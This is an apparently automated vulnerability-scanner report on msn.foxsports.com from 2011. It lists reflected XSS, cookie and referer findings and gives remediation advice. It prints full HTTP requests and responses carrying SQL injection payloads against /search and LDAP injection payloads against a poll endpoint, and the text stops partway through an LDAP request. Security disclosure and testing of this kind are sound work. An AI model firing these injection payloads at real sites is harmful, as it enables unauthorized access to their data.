msn.foxsports.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in msn.foxsports.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Jan 07 20:38:06 CST 2011.


CWE-79 Report by Hoyt LLC Research

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. SQL injection

2. LDAP injection

3. Cross-site scripting (reflected)

3.1. http://msn.foxsports.com/account/transition [egs parameter]

3.2. http://msn.foxsports.com/account/transition [esefsuid parameter]

3.3. http://msn.foxsports.com/account/transition [fu parameter]

3.4. http://msn.foxsports.com/account/transition [initiatingAction parameter]

3.5. http://msn.foxsports.com/account/transition [ts parameter]

3.6. http://msn.foxsports.com/boxing/gallery [name of an arbitrarily supplied request parameter]

3.7. http://msn.foxsports.com/boxing/odds/moneyline [REST URL parameter 3]

3.8. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611 [gt1 parameter]

3.9. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611 [name of an arbitrarily supplied request parameter]

3.10. http://msn.foxsports.com/golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611 [name of an arbitrarily supplied request parameter]

3.11. http://msn.foxsports.com/horseracing/story/the-road-to-the-2010-kentucky-derby- [name of an arbitrarily supplied request parameter]

3.12. http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611 [name of an arbitrarily supplied request parameter]

3.13. http://msn.foxsports.com/nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343 [name of an arbitrarily supplied request parameter]

3.14. http://msn.foxsports.com/nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611 [name of an arbitrarily supplied request parameter]

3.15. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610 [gt1 parameter]

3.16. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610 [name of an arbitrarily supplied request parameter]

3.17. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611 [gt1 parameter]

3.18. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611 [name of an arbitrarily supplied request parameter]

3.19. http://msn.foxsports.com/other/page/fox-flash [vid parameter]

3.20. http://msn.foxsports.com/search [name of an arbitrarily supplied request parameter]

3.21. http://msn.foxsports.com/search [name of an arbitrarily supplied request parameter]

3.22. http://msn.foxsports.com/search [sp_q parameter]

3.23. http://msn.foxsports.com/video [vid parameter]

3.24. http://msn.foxsports.com/video/NFL [vid parameter]

3.25. http://msn.foxsports.com/video/college-football [vid parameter]

3.26. http://msn.foxsports.com/video/shows/what-the-fox [vid parameter]

4. Flash cross-domain policy

5. Session token in URL

6. Open redirection

7. Cookie scoped to parent domain

7.1. http://msn.foxsports.com/account/logout

7.2. http://msn.foxsports.com/account/verify

7.3. http://msn.foxsports.com/fantasy/basketball/hotstreak/

7.4. http://msn.foxsports.com/fantasy/football/frankspicks/

8. Cookie without HttpOnly flag set

8.1. http://msn.foxsports.com/account/logout

8.2. http://msn.foxsports.com/account/regPopup

8.3. http://msn.foxsports.com/account/register

8.4. http://msn.foxsports.com/account/transition

8.5. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/

8.6. http://msn.foxsports.com/fantasy/collegefootball/pickem/

8.7. http://msn.foxsports.com/account/verify

8.8. http://msn.foxsports.com/fantasy/basketball/hotstreak/

8.9. http://msn.foxsports.com/fantasy/football/frankspicks/

9. Password field with autocomplete enabled

9.1. http://msn.foxsports.com/account/regPopup

9.2. http://msn.foxsports.com/account/register

10. Cross-domain Referer leakage

10.1. http://msn.foxsports.com/

10.2. http://msn.foxsports.com/

10.3. http://msn.foxsports.com/

10.4. http://msn.foxsports.com/account/register

10.5. http://msn.foxsports.com/account/transition

10.6. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611

10.7. http://msn.foxsports.com/collegefootball/gameTrax

10.8. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611

10.9. http://msn.foxsports.com/fantasy/basketball/hotstreak/

10.10. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/

10.11. http://msn.foxsports.com/fantasy/collegefootball/pickem/

10.12. http://msn.foxsports.com/fantasy/football/frankspicks/

10.13. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

10.14. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

10.15. http://msn.foxsports.com/morenews

10.16. http://msn.foxsports.com/nfl/story/NFL-coaches-hired-fired-interim-carousel-rumors-010211/

10.17. http://msn.foxsports.com/nfl/story/jeff-fisher-tennessee-titans-remains-head-coach-010711/

10.18. http://msn.foxsports.com/nfl/story/jim-harbaugh-san-francisco-49ers-agree-to-coach-010711/

10.19. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

10.20. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

10.21. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611

10.22. http://msn.foxsports.com/other/page/fox-flash

10.23. http://msn.foxsports.com/search

10.24. http://msn.foxsports.com/search

10.25. http://msn.foxsports.com/search

10.26. http://msn.foxsports.com/search

10.27. http://msn.foxsports.com/search

10.28. http://msn.foxsports.com/search

10.29. http://msn.foxsports.com/search

10.30. http://msn.foxsports.com/search

10.31. http://msn.foxsports.com/search

10.32. http://msn.foxsports.com/search

10.33. http://msn.foxsports.com/search

10.34. http://msn.foxsports.com/search

10.35. http://msn.foxsports.com/search

10.36. http://msn.foxsports.com/search

10.37. http://msn.foxsports.com/search

10.38. http://msn.foxsports.com/search

10.39. http://msn.foxsports.com/video

10.40. http://msn.foxsports.com/video/NFL

10.41. http://msn.foxsports.com/video/college-football

10.42. http://msn.foxsports.com/video/shows/inside-call

10.43. http://msn.foxsports.com/video/shows/picknation

10.44. http://msn.foxsports.com/video/shows/what-the-fox

11. Cross-domain script include

11.1. http://msn.foxsports.com/

11.2. http://msn.foxsports.com/account/transition

11.3. http://msn.foxsports.com/boxing

11.4. http://msn.foxsports.com/boxing/gallery

11.5. http://msn.foxsports.com/boxing/list-gallery

11.6. http://msn.foxsports.com/boxing/odds/moneyline

11.7. http://msn.foxsports.com/boxing/photo-gallery

11.8. http://msn.foxsports.com/boxing/story/Boxing-champions-031510

11.9. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611

11.10. http://msn.foxsports.com/boxing/story/boxing-schedule-031510

11.11. http://msn.foxsports.com/collegebasketball

11.12. http://msn.foxsports.com/collegebasketball/list-gallery

11.13. http://msn.foxsports.com/collegebasketball/odds/spread

11.14. http://msn.foxsports.com/collegebasketball/page/John-Wooden-1910-2010

11.15. http://msn.foxsports.com/collegebasketball/photo-gallery

11.16. http://msn.foxsports.com/collegebasketball/polls

11.17. http://msn.foxsports.com/collegebasketball/powerRankings

11.18. http://msn.foxsports.com/collegebasketball/schedule

11.19. http://msn.foxsports.com/collegebasketball/scores

11.20. http://msn.foxsports.com/collegebasketball/standings

11.21. http://msn.foxsports.com/collegebasketball/stats

11.22. http://msn.foxsports.com/collegebasketball/teams

11.23. http://msn.foxsports.com/collegefootball

11.24. http://msn.foxsports.com/collegefootball/gameTrax

11.25. http://msn.foxsports.com/collegefootball/list-gallery

11.26. http://msn.foxsports.com/collegefootball/odds/spread

11.27. http://msn.foxsports.com/collegefootball/photo-gallery

11.28. http://msn.foxsports.com/collegefootball/polls

11.29. http://msn.foxsports.com/collegefootball/powerRankings

11.30. http://msn.foxsports.com/collegefootball/schedule

11.31. http://msn.foxsports.com/collegefootball/scores

11.32. http://msn.foxsports.com/collegefootball/standings

11.33. http://msn.foxsports.com/collegefootball/stats

11.34. http://msn.foxsports.com/collegefootball/story/BCS-Bowl-Games-Schedule-2010-2011

11.35. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611

11.36. http://msn.foxsports.com/collegefootball/teams

11.37. http://msn.foxsports.com/fantasy

11.38. http://msn.foxsports.com/fantasy/baseball

11.39. http://msn.foxsports.com/fantasy/basketball/hotstreak/

11.40. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/

11.41. http://msn.foxsports.com/fantasy/collegefootball/pickem/

11.42. http://msn.foxsports.com/fantasy/football

11.43. http://msn.foxsports.com/fantasy/football/draftguide

11.44. http://msn.foxsports.com/fantasy/football/frankspicks/

11.45. http://msn.foxsports.com/fantasy/football/page/chat-index

11.46. http://msn.foxsports.com/fantasy/sports-games

11.47. http://msn.foxsports.com/fcs

11.48. http://msn.foxsports.com/feedback

11.49. http://msn.foxsports.com/foxsoccer

11.50. http://msn.foxsports.com/foxsoccer/championsleague

11.51. http://msn.foxsports.com/foxsoccer/england

11.52. http://msn.foxsports.com/foxsoccer/euro2012qualifying

11.53. http://msn.foxsports.com/foxsoccer/europe

11.54. http://msn.foxsports.com/foxsoccer/latinamerica

11.55. http://msn.foxsports.com/foxsoccer/premierleague

11.56. http://msn.foxsports.com/foxsoccer/tvschedule

11.57. http://msn.foxsports.com/foxsoccer/usa

11.58. http://msn.foxsports.com/fssearch

11.59. http://msn.foxsports.com/golf

11.60. http://msn.foxsports.com/golf/leaderboard

11.61. http://msn.foxsports.com/golf/list-gallery

11.62. http://msn.foxsports.com/golf/page/Tiger-Woods-Elin-Nordegren-divorce-official-golfer-sex-scandal

11.63. http://msn.foxsports.com/golf/photo-gallery

11.64. http://msn.foxsports.com/golf/schedule

11.65. http://msn.foxsports.com/golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611

11.66. http://msn.foxsports.com/home/page/fsn

11.67. http://msn.foxsports.com/horseracing

11.68. http://msn.foxsports.com/horseracing/story/the-road-to-the-2010-kentucky-derby-

11.69. http://msn.foxsports.com/list-gallery

11.70. http://msn.foxsports.com/mlb

11.71. http://msn.foxsports.com/mlb/injuries

11.72. http://msn.foxsports.com/mlb/list-gallery

11.73. http://msn.foxsports.com/mlb/odds/spread

11.74. http://msn.foxsports.com/mlb/photo-gallery

11.75. http://msn.foxsports.com/mlb/players

11.76. http://msn.foxsports.com/mlb/powerRankings

11.77. http://msn.foxsports.com/mlb/schedule

11.78. http://msn.foxsports.com/mlb/scores

11.79. http://msn.foxsports.com/mlb/standings

11.80. http://msn.foxsports.com/mlb/stats

11.81. http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608

11.82. http://msn.foxsports.com/mlb/story/Chicago-Cubs-close-to-landing-Matt-Garza-from-Tampa-Bay-Rays-010711

11.83. http://msn.foxsports.com/mlb/story/Free_Agent_Signings_80923322

11.84. http://msn.foxsports.com/mlb/story/Remaining-Free-Agents-List

11.85. http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List

11.86. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

11.87. http://msn.foxsports.com/mlb/teams

11.88. http://msn.foxsports.com/mlb/transactions

11.89. http://msn.foxsports.com/mma/odds/moneyline

11.90. http://msn.foxsports.com/morenews

11.91. http://msn.foxsports.com/motor

11.92. http://msn.foxsports.com/motor/f1

11.93. http://msn.foxsports.com/motor/f1/drivers

11.94. http://msn.foxsports.com/motor/f1/results

11.95. http://msn.foxsports.com/motor/f1/schedule

11.96. http://msn.foxsports.com/motor/f1/standings

11.97. http://msn.foxsports.com/motor/irl/drivers

11.98. http://msn.foxsports.com/motor/irl/results

11.99. http://msn.foxsports.com/motor/irl/schedule

11.100. http://msn.foxsports.com/motor/irl/standings

11.101. http://msn.foxsports.com/nascar

11.102. http://msn.foxsports.com/nascar/cup/drivers

11.103. http://msn.foxsports.com/nascar/cup/raceTrax

11.104. http://msn.foxsports.com/nascar/cup/results

11.105. http://msn.foxsports.com/nascar/cup/schedule

11.106. http://msn.foxsports.com/nascar/cup/standings

11.107. http://msn.foxsports.com/nascar/cup/stats

11.108. http://msn.foxsports.com/nascar/list-gallery

11.109. http://msn.foxsports.com/nascar/page/AllWaltrip-Darrell-Waltrip-NASCAR-on-FOX

11.110. http://msn.foxsports.com/nascar/photo-gallery

11.111. http://msn.foxsports.com/nascar/powerRankings

11.112. http://msn.foxsports.com/nascar/tracks

11.113. http://msn.foxsports.com/nba

11.114. http://msn.foxsports.com/nba/draft-central

11.115. http://msn.foxsports.com/nba/injuries

11.116. http://msn.foxsports.com/nba/list-gallery

11.117. http://msn.foxsports.com/nba/odds/spread

11.118. http://msn.foxsports.com/nba/page/LeBron-James-free-agency-watch-summer-2010

11.119. http://msn.foxsports.com/nba/page/NBA-Playoff-Central

11.120. http://msn.foxsports.com/nba/page/heat-or-threepeat

11.121. http://msn.foxsports.com/nba/photo-gallery

11.122. http://msn.foxsports.com/nba/players

11.123. http://msn.foxsports.com/nba/powerRankings

11.124. http://msn.foxsports.com/nba/schedule

11.125. http://msn.foxsports.com/nba/scores

11.126. http://msn.foxsports.com/nba/standings

11.127. http://msn.foxsports.com/nba/stats

11.128. http://msn.foxsports.com/nba/story/david-stern-talks-lebron-james-contraction-tattoos-with-jason-whitlock-010611

11.129. http://msn.foxsports.com/nba/teams

11.130. http://msn.foxsports.com/nba/transactions

11.131. http://msn.foxsports.com/nfl

11.132. http://msn.foxsports.com/nfl/draft-central

11.133. http://msn.foxsports.com/nfl/draft-tracker

11.134. http://msn.foxsports.com/nfl/gallery

11.135. http://msn.foxsports.com/nfl/injuries

11.136. http://msn.foxsports.com/nfl/list-gallery

11.137. http://msn.foxsports.com/nfl/odds/spread

11.138. http://msn.foxsports.com/nfl/page/Jay-Glazer-NFL-insider-NFL-on-FOX-Glazers-Edge

11.139. http://msn.foxsports.com/nfl/page/Super-Bowl-XLV-from-Cowboys-Stadium-airs-on-FOX-February-6-2011

11.140. http://msn.foxsports.com/nfl/photo-gallery

11.141. http://msn.foxsports.com/nfl/players

11.142. http://msn.foxsports.com/nfl/powerRankings

11.143. http://msn.foxsports.com/nfl/schedule

11.144. http://msn.foxsports.com/nfl/scores

11.145. http://msn.foxsports.com/nfl/standings

11.146. http://msn.foxsports.com/nfl/stats

11.147. http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611

11.148. http://msn.foxsports.com/nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343

11.149. http://msn.foxsports.com/nfl/story/NFL-coaches-hired-fired-interim-carousel-rumors-010211

11.150. http://msn.foxsports.com/nfl/story/NFL-coaches-hired-fired-interim-carousel-rumors-010211/

11.151. http://msn.foxsports.com/nfl/story/NFL-playoff-picture-scenarios-2010

11.152. http://msn.foxsports.com/nfl/story/NFL-playoffs-offer-test-of-focus-on-illegal-hits-33294493

11.153. http://msn.foxsports.com/nfl/story/Ravens-Ed-Reed-brother-wanted-by-police-010711

11.154. http://msn.foxsports.com/nfl/story/jeff-fisher-tennessee-titans-remains-head-coach-010711

11.155. http://msn.foxsports.com/nfl/story/jeff-fisher-tennessee-titans-remains-head-coach-010711/

11.156. http://msn.foxsports.com/nfl/story/jim-harbaugh-san-francisco-49ers-agree-to-coach-010711

11.157. http://msn.foxsports.com/nfl/story/jim-harbaugh-san-francisco-49ers-agree-to-coach-010711/

11.158. http://msn.foxsports.com/nfl/story/miami-dolphins-tony-sparano-jim-harbaugh-retain-head-coach-010611

11.159. http://msn.foxsports.com/nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611

11.160. http://msn.foxsports.com/nfl/story/new-york-jets-coach-rex-ryan-just-looks-foolish-NFL-playoffs-010711

11.161. http://msn.foxsports.com/nfl/story/ray-rice-baltimore-ravens-will-beat-kansas-city-chiefs-jamaal-charles-010711

11.162. http://msn.foxsports.com/nfl/teams

11.163. http://msn.foxsports.com/nfl/transactions

11.164. http://msn.foxsports.com/nfl/weeklyLeaders

11.165. http://msn.foxsports.com/nhl

11.166. http://msn.foxsports.com/nhl/dailyLeaders

11.167. http://msn.foxsports.com/nhl/injuries

11.168. http://msn.foxsports.com/nhl/list-gallery

11.169. http://msn.foxsports.com/nhl/odds/moneyline

11.170. http://msn.foxsports.com/nhl/photo-gallery

11.171. http://msn.foxsports.com/nhl/players

11.172. http://msn.foxsports.com/nhl/powerRankings

11.173. http://msn.foxsports.com/nhl/schedule

11.174. http://msn.foxsports.com/nhl/scores

11.175. http://msn.foxsports.com/nhl/stats

11.176. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

11.177. http://msn.foxsports.com/nhl/teams

11.178. http://msn.foxsports.com/nhl/transactions

11.179. http://msn.foxsports.com/olympics

11.180. http://msn.foxsports.com/olympics/list-gallery

11.181. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611

11.182. http://msn.foxsports.com/other/page/Incomplete-coverage-babes-cheerleaders-hotties-dancers-models-bikini-girls-and-more

11.183. http://msn.foxsports.com/other/page/fox-flash

11.184. http://msn.foxsports.com/other/page/privacy-policy

11.185. http://msn.foxsports.com/other/page/terms-of-use

11.186. http://msn.foxsports.com/photo-gallery

11.187. http://msn.foxsports.com/press

11.188. http://msn.foxsports.com/rssfeeds

11.189. http://msn.foxsports.com/siteIndex

11.190. http://msn.foxsports.com/tennis

11.191. http://msn.foxsports.com/tennis/gallery

11.192. http://msn.foxsports.com/tennis/players

11.193. http://msn.foxsports.com/tennis/rank

11.194. http://msn.foxsports.com/tennis/results

11.195. http://msn.foxsports.com/tennis/schedule

11.196. http://msn.foxsports.com/tv/schedule

11.197. http://msn.foxsports.com/video

11.198. http://msn.foxsports.com/video-central

11.199. http://msn.foxsports.com/video/Golf

11.200. http://msn.foxsports.com/video/MLB

11.201. http://msn.foxsports.com/video/MMA_Boxing

11.202. http://msn.foxsports.com/video/NASCAR

11.203. http://msn.foxsports.com/video/NBA

11.204. http://msn.foxsports.com/video/NFL

11.205. http://msn.foxsports.com/video/NHL

11.206. http://msn.foxsports.com/video/Olympics

11.207. http://msn.foxsports.com/video/Tennis

11.208. http://msn.foxsports.com/video/college-football

11.209. http://msn.foxsports.com/video/most-watched

11.210. http://msn.foxsports.com/video/shows

11.211. http://msn.foxsports.com/video/shows/afterparty

11.212. http://msn.foxsports.com/video/shows/big-12

11.213. http://msn.foxsports.com/video/shows/club-wpt

11.214. http://msn.foxsports.com/video/shows/coach-speak

11.215. http://msn.foxsports.com/video/shows/college-experiment

11.216. http://msn.foxsports.com/video/shows/cosmic-schein

11.217. http://msn.foxsports.com/video/shows/cubed

11.218. http://msn.foxsports.com/video/shows/cubed&from=foxsports/home/moresports

11.219. http://msn.foxsports.com/video/shows/inside-call

11.220. http://msn.foxsports.com/video/shows/lunch-with-benefits

11.221. http://msn.foxsports.com/video/shows/mlb-on-fox

11.222. http://msn.foxsports.com/video/shows/nfl-on-fox

11.223. http://msn.foxsports.com/video/shows/online-ot

11.224. http://msn.foxsports.com/video/shows/pac-10

11.225. http://msn.foxsports.com/video/shows/picknation

11.226. http://msn.foxsports.com/video/shows/what-the-fox

11.227. http://msn.foxsports.com/wcbk/polls

11.228. http://msn.foxsports.com/wcbk/schedule

11.229. http://msn.foxsports.com/wcbk/scores

11.230. http://msn.foxsports.com/wcbk/stats

11.231. http://msn.foxsports.com/wnba/schedule

11.232. http://msn.foxsports.com/wnba/scores

11.233. http://msn.foxsports.com/wnba/standings

11.234. http://msn.foxsports.com/wnba/stats

11.235. http://msn.foxsports.com/writer/Alex_Marvez

11.236. http://msn.foxsports.com/writer/Bill_Reiter

11.237. http://msn.foxsports.com/writer/Brian_Lowry

11.238. http://msn.foxsports.com/writer/Jason_Whitlock

11.239. http://msn.foxsports.com/writer/Jay_Glazer

11.240. http://msn.foxsports.com/writer/Jeff_Goodman

11.241. http://msn.foxsports.com/writer/Ken_Rosenthal

11.242. http://msn.foxsports.com/writer/Lee_Spencer

11.243. http://msn.foxsports.com/writer/Mark_Kriegel

11.244. http://msn.foxsports.com/writer/Peter_Schrager

11.245. http://msn.foxsports.com/writer/Robert_Lusetich

11.246. http://msn.foxsports.com/writer/Thayer_Evans

12. Email addresses disclosed

12.1. http://msn.foxsports.com/account/regPopup

12.2. http://msn.foxsports.com/feedback

12.3. http://msn.foxsports.com/nba/story/david-stern-talks-lebron-james-contraction-tattoos-with-jason-whitlock-010611

12.4. http://msn.foxsports.com/other/page/privacy-policy

12.5. http://msn.foxsports.com/other/page/terms-of-use

12.6. http://msn.foxsports.com/search

12.7. http://msn.foxsports.com/video/shows/afterparty

12.8. http://msn.foxsports.com/video/shows/coach-speak

12.9. http://msn.foxsports.com/video/shows/college-experiment

12.10. http://msn.foxsports.com/video/shows/cubed

12.11. http://msn.foxsports.com/video/shows/cubed&from=foxsports/home/moresports

12.12. http://msn.foxsports.com/writer/Jason_Whitlock

12.13. http://msn.foxsports.com/writer/Peter_Schrager

13. Content type incorrectly stated

13.1. http://msn.foxsports.com/account/resetPassword

13.2. http://msn.foxsports.com/emailLink

13.3. http://msn.foxsports.com/user.js

14. Content type is not specified



1. SQL injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://msn.foxsports.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13403961'%20or%201%3d1--%20 and 13403961'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /search?sp_q=nascar_news&113403961'%20or%201%3d1--%20=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 50895
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n31 ( iad-agg-n25), ms iad-agg-n25 ( jfk-agg-n25), ms jfk-agg-n25 ( origin>CONN)
Cache-Control: max-age=3584
Expires: Sat, 08 Jan 2011 02:08:55 GMT
Date: Sat, 08 Jan 2011 01:09:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
<ol scriptid="353778712945" class="ez-mod-content">
<li class="ez-itemMod-item ez-Video ez-first ez-col ez-col-first ez-item-dynamic-snippets ">
<div class="ez-thumbs">
<a title="Under the Hood: Waiting for 'Dega" target="" rel="nofollow" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/34799455/under-the-hood-waiting-for-dega.htm?q=nascar_news"><img src="http://img2.catalog.video.msn.com/image.aspx?uuid=5378e33e-c227-468a-b4a0-a9a2c623d712&w=136&h=102" class="ez-primaryThumb"></a>
</div>
<div class="ez-main">
<a target="" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/34799455/under-the-hood-waiting-for-dega.htm?q=nascar_news" galabel="internal" class="ez-title">Under the Hood: Waiting for 'Dega </a>
<div class="ez-meta"></div>
<p class="ez-desc">Why is Talladega on the mind of Jimmie Johnson? FOXSports.com's Lee Spencer has the latest NASCAR news.</p>
</div>
<div class="ez-clearingDiv"></div>
</li>
<li class="ez-itemMod-item ez-Video ez-col ez-col-last ez-item-dynamic-snippets ">
<div class="ez-thumbs">
<a title="Under the Hood: What's the Problem?" target="" rel="nofollow" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/33661444/under-the-hood-what-s-the-problem.htm?q=nascar_news"><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=6c65fe5b-0c18-4ec6-80b3-89d405604f7a&w=136&h=102" class="ez-primaryThumb"></a>
</div>
<div class="ez-main">
<a target="" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/33661444/under-the-hood-what-s-the-problem.htm?q=nascar_news" galabel="internal" class="ez-title">Under the Hood: What's the Problem? </a>
<div class="ez-meta"></div>
<p class="ez-desc">
<b>&#133; </b>area and. Under our league gets out thanks for joining us and remember foxsports.com. Has you covered for all your <
...[SNIP]...

Request 2

GET /search?sp_q=nascar_news&113403961'%20or%201%3d2--%20=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 50931
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n31 ( iad-agg-n33), ms iad-agg-n33 ( jfk-agg-n58), ms jfk-agg-n58 ( origin>CONN)
Cache-Control: max-age=3596
Expires: Sat, 08 Jan 2011 02:09:09 GMT
Date: Sat, 08 Jan 2011 01:09:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
<ol scriptid="4195723982358" class="ez-mod-content">
<li class="ez-itemMod-item ez-Video ez-first ez-col ez-col-first ez-item-dynamic-snippets ">
<div class="ez-thumbs">
<a title="Under the Hood: Waiting for 'Dega" target="" rel="nofollow" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/34799455/under-the-hood-waiting-for-dega.htm?q=nascar_news"><img src="http://img2.catalog.video.msn.com/image.aspx?uuid=5378e33e-c227-468a-b4a0-a9a2c623d712&w=136&h=102" class="ez-primaryThumb"></a>
</div>
<div class="ez-main">
<a target="" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/34799455/under-the-hood-waiting-for-dega.htm?q=nascar_news" galabel="internal" class="ez-title">Under the Hood: Waiting for 'Dega </a>
<div class="ez-meta"></div>
<p class="ez-desc">Why is Talladega on the mind of Jimmie Johnson? FOXSports.com's Lee Spencer has the latest NASCAR news.</p>
</div>
<div class="ez-clearingDiv"></div>
</li>
<li class="ez-itemMod-item ez-Video ez-col ez-col-last ez-item-dynamic-snippets ">
<div class="ez-thumbs">
<a title="Under the Hood: What's the Problem?" target="" rel="nofollow" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/33661444/under-the-hood-what-s-the-problem.htm?q=nascar_news"><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=6c65fe5b-0c18-4ec6-80b3-89d405604f7a&w=136&h=102" class="ez-primaryThumb"></a>
</div>
<div class="ez-main">
<a target="" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/33661444/under-the-hood-what-s-the-problem.htm?q=nascar_news" galabel="internal" class="ez-title">Under the Hood: What's the Problem? </a>
<div class="ez-meta"></div>
<p class="ez-desc">
<b>&#133; </b>area and. Under our league gets out thanks for joining us and remember foxsports.com. Has you covered for all your
...[SNIP]...

2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://msn.foxsports.com
Path:   /module/pollaction

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /module/*)(sn=*;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
